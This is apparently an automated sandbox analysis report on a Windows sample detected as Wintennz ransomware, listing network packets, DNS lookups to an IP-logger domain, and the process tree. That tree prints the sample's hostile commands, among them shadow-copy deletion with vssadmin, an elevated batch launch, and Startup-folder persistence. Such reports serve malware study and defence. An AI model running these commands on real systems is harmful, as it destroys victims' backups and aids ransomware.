Apr 11, 2021 12:57:01.693372011 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.693423986 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.693444014 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.693739891 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.693783045 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.693833113 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.693856001 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.694518089 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.694566965 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.694597006 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.694622993 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.695270061 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.695318937 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.695342064 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.695398092 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.696288109 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.696337938 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.696382046 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.696400881 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.696906090 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.696954966 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.696985006 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.697007895 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.697704077 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.697747946 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.697782993 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.697802067 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.698976994 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.699024916 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.699048996 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.699070930 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.699502945 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.699546099 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.699570894 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.699595928 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.700160980 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.700210094 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.700226068 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.700278997 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.700906038 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.700948000 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.700974941 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.700984001 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.701025963 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.701037884 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.701052904 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.701111078 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.701632977 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.701682091 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.701896906 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.702588081 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.702637911 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.702661037 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.702687025 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.703730106 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.703767061 CEST	443	49750	91.198.174.208	192.168.2.4
Apr 11, 2021 12:57:01.703794956 CEST	49750	443	192.168.2.4	91.198.174.208
Apr 11, 2021 12:57:01.703819036 CEST	49750	443	192.168.2.4	91.198.174.208

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2021 12:56:22.103519917 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:22.116933107 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:23.215219021 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:23.228219032 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:24.275309086 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:24.291651964 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:25.890914917 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:25.903842926 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:26.978127956 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:26.990798950 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:27.998940945 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:28.011008024 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:28.734888077 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:28.747836113 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:29.699728012 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:29.718159914 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:31.028012991 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:31.041011095 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:32.521414042 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:32.534610033 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:33.273982048 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:33.287256956 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:34.498538017 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:34.511106968 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:35.439666033 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:35.453025103 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:36.412806034 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:36.426367044 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:37.431631088 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:37.444329977 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:38.594785929 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:38.608685970 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:39.748797894 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:39.762226105 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:40.608964920 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:40.621463060 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:41.625252962 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:41.638839006 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:50.486285925 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:50.518892050 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:52.581886053 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:52.594491959 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:56.131309032 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:56.149862051 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 11, 2021 12:56:59.919651031 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:56:59.937566042 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:01.090748072 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:01.103502989 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:01.472116947 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:01.498279095 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:11.704427958 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:11.793230057 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:12.397034883 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:12.486041069 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:13.011034012 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:13.024597883 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:13.310859919 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:13.324296951 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:13.671637058 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:13.698198080 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:13.907776117 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:13.920900106 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:14.449264050 CEST	50183	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:14.462177992 CEST	53	50183	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:14.829252005 CEST	61531	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:14.841999054 CEST	53	61531	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:15.642920971 CEST	49228	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:15.656541109 CEST	53	49228	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:16.572248936 CEST	59794	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:16.675010920 CEST	53	59794	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:16.956520081 CEST	55916	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:17.058801889 CEST	53	55916	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:27.738428116 CEST	52752	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:27.751215935 CEST	53	52752	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:27.820658922 CEST	60542	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:27.847419977 CEST	53	60542	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:29.887403965 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:29.910723925 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:30.577611923 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:30.590524912 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:30.894059896 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:30.906876087 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:31.178657055 CEST	50904	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:31.197227001 CEST	53	50904	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:31.564477921 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:31.577455997 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:31.908019066 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:31.920948982 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:32.580593109 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:32.593605995 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:33.929919004 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:33.943147898 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:34.600507975 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:34.613331079 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:37.924139977 CEST	60689	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:37.937553883 CEST	53	60689	8.8.8.8	192.168.2.4
Apr 11, 2021 12:57:38.612533092 CEST	64206	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:57:38.625247955 CEST	53	64206	8.8.8.8	192.168.2.4
Apr 11, 2021 12:58:00.837836027 CEST	57525	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:58:00.851845980 CEST	53	57525	8.8.8.8	192.168.2.4
Apr 11, 2021 12:58:01.390919924 CEST	53814	53	192.168.2.4	8.8.8.8
Apr 11, 2021 12:58:01.404196978 CEST	53	53814	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 11, 2021 12:57:01.090748072 CEST	192.168.2.4	8.8.8.8	0xd818	Standard query (0)	2no.co	A (IP address)	IN (0x0001)
Apr 11, 2021 12:57:01.472116947 CEST	192.168.2.4	8.8.8.8	0x94cb	Standard query (0)	upload.wikimedia.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 11, 2021 12:57:01.103502989 CEST	8.8.8.8	192.168.2.4	0xd818	No error (0)	2no.co		88.99.66.31	A (IP address)	IN (0x0001)
Apr 11, 2021 12:57:01.498279095 CEST	8.8.8.8	192.168.2.4	0x94cb	No error (0)	upload.wikimedia.org		91.198.174.208	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 11, 2021 12:57:01.355161905 CEST	88.99.66.31	443	192.168.2.4	49748	CN=iplogger.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Mar 02 23:03:08 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Tue Jun 01 00:03:08 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 11, 2021 12:57:01.355161905 CEST	88.99.66.31	443	192.168.2.4	49748	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		9e10692f1b7f78228b2d4e424db3a98c
Apr 11, 2021 12:57:01.361166000 CEST	88.99.66.31	443	192.168.2.4	49749	CN=iplogger.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Mar 02 23:03:08 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Tue Jun 01 00:03:08 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 11, 2021 12:57:01.361166000 CEST	88.99.66.31	443	192.168.2.4	49749	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		9e10692f1b7f78228b2d4e424db3a98c
Apr 11, 2021 12:57:01.571460009 CEST	91.198.174.208	443	192.168.2.4	49750	CN=*.wikipedia.org, O="Wikimedia Foundation, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 09 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Wed Nov 17 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 11, 2021 12:57:01.571460009 CEST	91.198.174.208	443	192.168.2.4	49750	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Apr 11, 2021 12:57:01.572228909 CEST	91.198.174.208	443	192.168.2.4	49751	CN=*.wikipedia.org, O="Wikimedia Foundation, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 09 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Wed Nov 17 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Apr 11, 2021 12:57:01.572228909 CEST	91.198.174.208	443	192.168.2.4	49751	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: IJht2pqbVh.exe PID: 7096 Parent PID: 5920

General

Start time:	12:56:27
Start date:	11/04/2021
Path:	C:\Users\user\Desktop\IJht2pqbVh.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\IJht2pqbVh.exe'
Imagebase:	0x7ff606e10000
File size:	941568 bytes
MD5 hash:	2716659C3B1E8927DCB2E418E99B1EA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wintennz, Description: Yara detected Wintennz Ransomware, Source: 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Wintennz, Description: Yara detected Wintennz Ransomware, Source: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 7148 Parent PID: 7096

General

Start time:	12:56:28
Start date:	11/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'powershell' get-wmiobject win32_computersystem \| fl model
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6260 Parent PID: 7148

General

Start time:	12:56:28
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 5992 Parent PID: 7096

General

Start time:	12:56:36
Start date:	11/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6016 Parent PID: 5992

General

Start time:	12:56:36
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6396 Parent PID: 5992

General

Start time:	12:56:38
Start date:	11/04/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /C 'C:\ProgramData\winfrce.bat'
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6492 Parent PID: 6396

General

Start time:	12:56:39
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vssadmin.exe PID: 6588 Parent PID: 6396

General

Start time:	12:56:39
Start date:	11/04/2021
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin.exe Delete Shadows /All /Quiet
Imagebase:	0x7ff778120000
File size:	145920 bytes
MD5 hash:	47D51216EF45075B5F7EAA117CC70E40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: vssadmin.exe PID: 6976 Parent PID: 6396

General

Start time:	12:56:41
Start date:	11/04/2021
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
Imagebase:	0x7ff778120000
File size:	145920 bytes
MD5 hash:	47D51216EF45075B5F7EAA117CC70E40
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6552 Parent PID: 7096

General

Start time:	12:56:47
Start date:	11/04/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\rstrt.bat''
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6812 Parent PID: 6552

General

Start time:	12:56:47
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6296 Parent PID: 3424

General

Start time:	12:56:58
Start date:	11/04/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTOPEN_ote.html
Imagebase:	0x7ff778460000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 900 Parent PID: 6296

General

Start time:	12:56:59
Start date:	11/04/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6296 CREDAT:17410 /prefetch:2
Imagebase:	0x270000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: winstrt10.exe PID: 3492 Parent PID: 3424

General

Start time:	12:57:06
Start date:	11/04/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe'
Imagebase:	0x7ff78d1a0000
File size:	941568 bytes
MD5 hash:	2716659C3B1E8927DCB2E418E99B1EA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Wintennz, Description: Yara detected Wintennz Ransomware, Source: 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Wintennz, Description: Yara detected Wintennz Ransomware, Source: 00000016.00000002.794273843.00007FF78D252000.00000002.00020000.sdmp, Author: Joe Security Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe, Author: Florian Roth Rule: JoeSecurity_Wintennz, Description: Yara detected Wintennz Ransomware, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe, Author: Joe Security
Antivirus matches:	Detection: 27%, Metadefender, Browse Detection: 62%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 2792 Parent PID: 3492

General

Start time:	12:57:07
Start date:	11/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'powershell' get-wmiobject win32_computersystem \| fl model
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6032 Parent PID: 2792

General

Start time:	12:57:07
Start date:	11/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 5996 Parent PID: 3492

General

Start time:	12:57:19
Start date:	11/04/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'powershell' Start-Process C:\ProgramData\winfrce.bat -Verb runas
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

